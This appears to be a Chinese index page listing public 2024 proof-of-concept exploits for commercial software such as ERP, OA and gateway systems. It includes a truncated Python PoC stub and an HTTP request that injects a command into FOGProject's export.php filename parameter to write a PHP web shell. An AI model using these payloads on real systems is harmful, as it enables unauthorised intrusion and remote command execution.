2024你懂的 第15页
2024攻防互联网公开POC
天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞_秃兔安全
KubePi存在JWT token验证绕过漏洞_秃兔安全
科荣 AIO 管理系统任意文件读取_秃兔安全

科荣 AIO 管理系统任意文件读取

import base64import requests def poc(ip, file_path): # 构造URL地址url = f’http://{ip}/UtilServlet’headers = { 登录可见余下内容
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01098
H3C Magic B1STV100R012 RCE_秃兔安全
锐捷EG350易网关管理系统存在信息泄露漏洞_秃兔安全
⻜企互联loginService任意登录_秃兔安全
RAISECOM网关设备list_base_config.php存在远程命令执行漏洞_秃兔安全
fogproject系统接口export.php存在远程命令执行漏洞_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01075
云时空商业ERP文件上传_秃兔安全
金和OA jc6 clobfield SQL注入漏洞_秃兔安全